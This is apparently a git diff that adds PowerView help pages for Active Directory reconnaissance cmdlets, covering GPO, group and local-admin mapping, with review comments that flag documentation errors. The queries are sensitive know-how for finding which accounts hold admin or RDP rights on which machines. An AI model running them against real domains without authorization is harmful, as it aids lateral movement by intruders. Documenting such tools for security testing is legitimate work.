+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.GPO
+
+Custom PSObject with translated GPO property fields.
+
+PowerView.GPO.Raw
+
+The raw DirectoryServices.SearchResult object, if -Raw is enabled.
+
+## NOTES
+
+## RELATED LINKS
+
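Review bot: EXAMPLE 4 (`Get-DomainGPO -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon`) has no description, and primarygroupid, samaccountname and lastlogon are user/computer attributes that groupPolicyContainer objects do not carry, so the example looks copied from Get-DomainUser and would return nothing useful; replace it with a GPO-relevant filter and properties (displayname, gpcfilesyspath, flags, whenchanged), and for the same reason drop "samaccountname" from the DESCRIPTION's "-Properties samaccountname,usnchanged,..." hint. The DESCRIPTION and EXAMPLE 2 use "-ComputerName X" while the parameter is documented as -ComputerIdentity (ComputerName is only an alias); the docs should use the canonical name. Smaller items: "properies" in the DESCRIPTION; EXAMPLE 2 reads "Returns all GPOs applied windows1.testlab.local" and is missing "to"; EXAMPLE 5's fence closes after the first line so `$Cred = ...` and `Get-DomainGPO -Credential $Cred` sit outside the code block and the example has no description; -Identity says "Wildcards accepted." in prose but "Accept wildcard characters: False" in yaml; under OUTPUTS "PowerView.GPO.Raw" should be a "### " heading like "### PowerView.GPO"; and -ServerTimeLimit again says "Default of 120 seconds." versus "Default value: 0".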
diff --git a/docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md b/docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md new file mode 100755 index 0000000..4e5015b --- /dev/null +++ b/docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md @@ -0,0 +1,263 @@ +# Get-DomainGPOComputerLocalGroupMapping
+
+## SYNOPSIS
+Takes a computer (or GPO) object and determines what users/groups are in the specified
+local group for the machine through GPO correlation.
+
+Author: @harmj0y
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainGPOLocalGroup
+
+## SYNTAX
+
+### ComputerIdentity (Default)
+```
+Get-DomainGPOComputerLocalGroupMapping [-ComputerIdentity] <String> [-LocalGroup <String>] [-Domain <String>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+### OUIdentity
+```
+Get-DomainGPOComputerLocalGroupMapping -OUIdentity <String> [-LocalGroup <String>] [-Domain <String>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function is the inverse of Get-DomainGPOUserLocalGroupMapping, and finds what users/groups
+are in the specified local group for a target machine through GPO correlation.
+
+If a -ComputerIdentity is specified, retrieve the complete computer object, attempt to
+determine the OU the computer is a part of.
+Then resolve the computer's site name with
+Get-NetComputerSiteName and retrieve all sites object Get-DomainSite.
+For those results, attempt to
+enumerate all linked GPOs and associated local group settings with Get-DomainGPOLocalGroup.
+For
+each resulting GPO group, resolve the resulting user/group name to a full AD object and
+return the results.
+This will return the domain objects that are members of the specified
+-LocalGroup for the given computer.
+
+Otherwise, if -OUIdentity is supplied, the same process is executed to find linked GPOs and
+localgroup specifications.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainGPOComputerLocalGroupMapping -ComputerName WINDOWS3.testlab.local
+```
+
+Finds users who have local admin rights over WINDOWS3 through GPO correlation.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainGPOComputerLocalGroupMapping -Domain dev.testlab.local -ComputerName WINDOWS4.dev.testlab.local -LocalGroup RDP
+```
+
+Finds users who have RDP rights over WINDOWS4 through GPO correlation.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPOComputerLocalGroupMapping -Credential $Cred -ComputerIdentity SQL.testlab.local
+
+## PARAMETERS
+
+### -ComputerIdentity
+A SamAccountName (e.g.
+WINDOWS10$), DistinguishedName (e.g.
+CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g.
+4f16b6bc-7010-4cbf-b628-f3cfe20f6994),
+or a dns host name (e.g.
+windows10.testlab.local) for the computer to identity GPO local group mappings for.
+
+```yaml
+Type: String
+Parameter Sets: ComputerIdentity
+Aliases: ComputerName, Computer, DistinguishedName, SamAccountName, Name
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -OUIdentity
+An OU name (e.g.
+TestOU), DistinguishedName (e.g.
+OU=TestOU,DC=testlab,DC=local), or
+GUID (e.g.
+8a9ba22a-8977-47e6-84ce-8c26af4e1e6a) for the OU to identity GPO local group mappings for.
+
+```yaml
+Type: String
+Parameter Sets: OUIdentity
+Aliases: OU
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LocalGroup
+The local group to check access against.
+Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),
+or a custom local SID.
+Defaults to local 'Administrators'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Administrators
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to enumerate GPOs for, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+{{Fill SearchBase Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.GGPOComputerLocalGroupMember
+
+## NOTES
+
+## RELATED LINKS
+
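Review bot: the -SearchBase parameter still carries the platyPS placeholder "{{Fill SearchBase Description}}"; fill it in with the same text used by the sibling files ("The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries."). In the DESCRIPTION, "Then resolve the computer's site name with Get-NetComputerSiteName and retrieve all sites object Get-DomainSite." is garbled and should read something like "and retrieve the site object with Get-DomainSite"; in -ComputerIdentity and -OUIdentity, "to identity GPO local group mappings for" should be "to identify". The OUTPUTS type "PowerView.GGPOComputerLocalGroupMember" has a doubled G that does not match the "PowerView.GPO..." naming used elsewhere in this commit; check it against the PSTypeName the function actually assigns, and add a one-line description under it as the other files do. EXAMPLE 1 and 2 use -ComputerName although the parameter is documented as -ComputerIdentity (ComputerName is an alias); EXAMPLE 3's fence closes after the first line, leaving `$Cred = ...` and `Get-DomainGPOComputerLocalGroupMapping -Credential $Cred -ComputerIdentity SQL.testlab.local` outside the code block with no description; and -ServerTimeLimit says "Default of 120 seconds." in prose but "Default value: 0" in yaml.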
diff --git a/docs/Recon/Get-DomainGPOLocalGroup.md b/docs/Recon/Get-DomainGPOLocalGroup.md new file mode 100755 index 0000000..e61fb82 --- /dev/null +++ b/docs/Recon/Get-DomainGPOLocalGroup.md @@ -0,0 +1,259 @@ +# Get-DomainGPOLocalGroup
+
+## SYNOPSIS
+Returns all GPOs in a domain that modify local group memberships through 'Restricted Groups'
+or Group Policy preferences.
+Also return their user membership mappings, if they exist.
+
+Author: @harmj0y
+License: BSD 3-Clause
+Required Dependencies: Get-DomainGPO, Get-GptTmpl, Get-GroupsXML, ConvertTo-SID, ConvertFrom-SID
+
+## SYNTAX
+
+```
+Get-DomainGPOLocalGroup [[-Identity] <String[]>] [-ResolveMembersToSIDs] [-Domain <String>]
+ [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+First enumerates all GPOs in the current/target domain using Get-DomainGPO with passed
+arguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or
+group membership is set through Group Policy Preferences groups.xml files.
+For any
+GptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership'
+section data is processed if present.
+Any found Groups.xml files are parsed with
+Get-GroupsXML and those memberships are returned as well.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainGPOLocalGroup
+```
+
+Returns all local groups set by GPO along with their members and memberof.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainGPOLocalGroup -ResolveMembersToSIDs
+```
+
+Returns all local groups set by GPO along with their members and memberof,
+and resolve any members to their domain SIDs.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+'{0847C615-6C4E-4D45-A064-6001040CC21C}' | Get-DomainGPOLocalGroup
+```
+
+Return any GPO-set groups for the GPO with the given name/GUID.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-DomainGPOLocalGroup 'Desktops'
+```
+
+Return any GPO-set groups for the GPO with the given display name.
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPOLocalGroup -Credential $Cred
+
+## PARAMETERS
+
+### -Identity
+A display name (e.g.
+'Test GPO'), DistinguishedName (e.g.
+'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'),
+GUID (e.g.
+'10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g.
+'{F260B76D-55C8-46C5-BEF1-9016DD98E272}').
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ResolveMembersToSIDs
+Switch.
+Indicates that any member names should be resolved to their domain SIDs.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.GPOGroup
+
+## NOTES
+
+## RELATED LINKS
+
+[https://morgansimonsenblog.azurewebsites.net/tag/groups/](https://morgansimonsenblog.azurewebsites.net/tag/groups/)
+
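Review bot: EXAMPLE 5's code fence closes after the `$SecPassword = ...` line, so `$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)` and `Get-DomainGPOLocalGroup -Credential $Cred` render as body text, and the example has no description line; move the closing fence below the third line and add a sentence such as "Returns all local groups set by GPO in the current domain, using the specified alternate credentials." The OUTPUTS entry "### PowerView.GPOGroup" has no description, unlike the other files in this commit; a line stating what the object carries (the GPO name/path plus the parsed local group name, members and memberof) would make it consistent. -ServerTimeLimit repeats the "Default of 120 seconds." versus "Default value: 0" mismatch seen in the other files, and in EXAMPLE 2 "and resolve any members to their domain SIDs" should be "resolving any members to their domain SIDs" to match the sentence it continues.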
diff --git a/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md b/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md new file mode 100755 index 0000000..d42a4be --- /dev/null +++ b/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md @@ -0,0 +1,258 @@ +# Get-DomainGPOUserLocalGroupMapping
+
+## SYNOPSIS
+Enumerates the machines where a specific domain user/group is a member of a specific
+local group, all through GPO correlation.
+If no user/group is specified, all
+discoverable mappings are returned.
+
+Author: @harmj0y
+License: BSD 3-Clause
+Required Dependencies: Get-DomainGPOLocalGroup, Get-DomainObject, Get-DomainComputer, Get-DomainOU, Get-DomainSite, Get-DomainGroup
+
+## SYNTAX
+
+```
+Get-DomainGPOUserLocalGroupMapping [[-Identity] <String>] [-LocalGroup <String>] [-Domain <String>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Takes a user/group name and optional domain, and determines the computers in the domain
+the user/group has local admin (or RDP) rights to.
+
+It does this by:
+ 1.
+resolving the user/group to its proper SID
+ 2.
+enumerating all groups the user/group is a current part of
+ and extracting all target SIDs to build a target SID list
+ 3.
+pulling all GPOs that set 'Restricted Groups' or Groups.xml by calling
+ Get-DomainGPOLocalGroup
+ 4.
+matching the target SID list to the queried GPO SID list
+ to enumerate all GPO the user is effectively applied with
+ 5.
+enumerating all OUs and sites and applicable GPO GUIs are
+ applied to through gplink enumerating
+ 6.
+querying for all computers under the given OUs or sites
+
+If no user/group is specified, all user/group -\> machine mappings discovered through
+GPO relationships are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-GPOLocation
+```
+
+Find all user/group -\> machine relationships where the user/group is a member
+of the local administrators group on target machines.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-GPOLocation -UserName dfm -Domain dev.testlab.local
+```
+
+Find all computers that dfm user has local administrator rights to in
+the dev.testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Find-GPOLocation -UserName dfm -Domain dev.testlab.local
+```
+
+Find all computers that dfm user has local administrator rights to in
+the dev.testlab.local domain.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPOUserLocalGroupMapping -Credential $Cred
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+for the user/group to identity GPO local group mappings for.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -LocalGroup
+The local group to check access against.
+Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),
+or a custom local SID.
+Defaults to local 'Administrators'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Administrators
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to enumerate GPOs for, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+{{Fill SearchBase Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.GPOLocalGroupMapping
+
+A custom PSObject containing any target identity information and what local
+group memberships they're a part of through GPO correlation.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/](http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/)
+
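Review bot: Examples 1 to 3 document the old function name and parameter: `Find-GPOLocation -UserName dfm -Domain dev.testlab.local` does not match the SYNTAX block, which lists `Get-DomainGPOUserLocalGroupMapping [[-Identity] <String>] [-LocalGroup <String>] ...` and has no `-UserName`, and Example 3 is a verbatim copy of Example 2. Update the examples to the new name and `-Identity`, and drop the duplicate. Three smaller documentation issues in the same file: `-SearchBase` still has the platyPS placeholder `{{Fill SearchBase Description}}`; `-ServerTimeLimit` says "Default of 120 seconds" while the metadata block says `Default value: 0`, so state which applies; and in Example 4 the code fence closes after the first line, leaving the `$Cred = ...` and `Get-DomainGPOUserLocalGroupMapping -Credential $Cred` lines rendered as prose (the same pattern appears in the other files of this commit). Also "GPO GUIs" in step 5 of DESCRIPTION should read "GPO GUIDs", and "to identity GPO local group mappings" under `-Identity` should be "to identify".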
diff --git a/docs/Recon/Get-DomainGroup.md b/docs/Recon/Get-DomainGroup.md new file mode 100755 index 0000000..faaa082 --- /dev/null +++ b/docs/Recon/Get-DomainGroup.md @@ -0,0 +1,397 @@ +# Get-DomainGroup
+
+## SYNOPSIS
+Return all groups or specific group objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Get-DomainObject, Convert-ADName, Convert-LDAPProperty
+
+## SYNTAX
+
+```
+Get-DomainGroup [[-Identity] <String[]>] [-MemberIdentity <String>] [-AdminCount] [-Domain <String>]
+ [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]
+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]
+ [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties samaccountname,usnchanged,...".
+By default, all group objects for
+the current domain are returned.
+To return the groups a specific user/group is
+a part of, use -MemberIdentity X to execute token groups enumeration.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainGroup | select samaccountname
+```
+
+samaccountname
+--------------
+WinRMRemoteWMIUsers__
+Administrators
+Users
+Guests
+Print Operators
+Backup Operators
+...
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainGroup *admin* | select distinguishedname
+```
+
+distinguishedname
+-----------------
+CN=Administrators,CN=Builtin,DC=testlab,DC=local
+CN=Hyper-V Administrators,CN=Builtin,DC=testlab,DC=local
+CN=Schema Admins,CN=Users,DC=testlab,DC=local
+CN=Enterprise Admins,CN=Users,DC=testlab,DC=local
+CN=Domain Admins,CN=Users,DC=testlab,DC=local
+CN=DnsAdmins,CN=Users,DC=testlab,DC=local
+CN=Server Admins,CN=Users,DC=testlab,DC=local
+CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainGroup -Properties samaccountname -Identity 'S-1-5-21-890171859-3433809279-3366196753-1117' | fl
+```
+
+samaccountname
+--------------
+Server Admins
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+'CN=Desktop Admins,CN=Users,DC=testlab,DC=local' | Get-DomainGroup -Server primary.testlab.local -Verbose
+```
+
+VERBOSE: Get-DomainSearcher search string: LDAP://DC=testlab,DC=local
+VERBOSE: Get-DomainGroup filter string: (&(objectCategory=group)(|(distinguishedname=CN=DesktopAdmins,CN=Users,DC=testlab,DC=local)))
+
+usncreated : 13245
+grouptype : -2147483646
+samaccounttype : 268435456
+samaccountname : Desktop Admins
+whenchanged : 8/10/2016 12:30:30 AM
+objectsid : S-1-5-21-890171859-3433809279-3366196753-1118
+objectclass : {top, group}
+cn : Desktop Admins
+usnchanged : 13255
+dscorepropagationdata : 1/1/1601 12:00:00 AM
+name : Desktop Admins
+distinguishedname : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+member : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+whencreated : 8/10/2016 12:29:43 AM
+instancetype : 4
+objectguid : f37903ed-b333-49f4-abaa-46c65e9cca71
+objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=testlab,DC=local
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGroup -Credential $Cred
+
+### -------------------------- EXAMPLE 6 --------------------------
+```
+Get-Domain | Select-Object -Expand name
+```
+
+testlab.local
+
+'DEV\Domain Admins' | Get-DomainGroup -Verbose -Properties distinguishedname
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainGroup\] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins'
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: \[Get-DomainGroup\] filter string: (&(objectCategory=group)(|(samAccountName=Domain Admins)))
+
+distinguishedname
+-----------------
+CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+Group1), DistinguishedName (e.g.
+CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g.
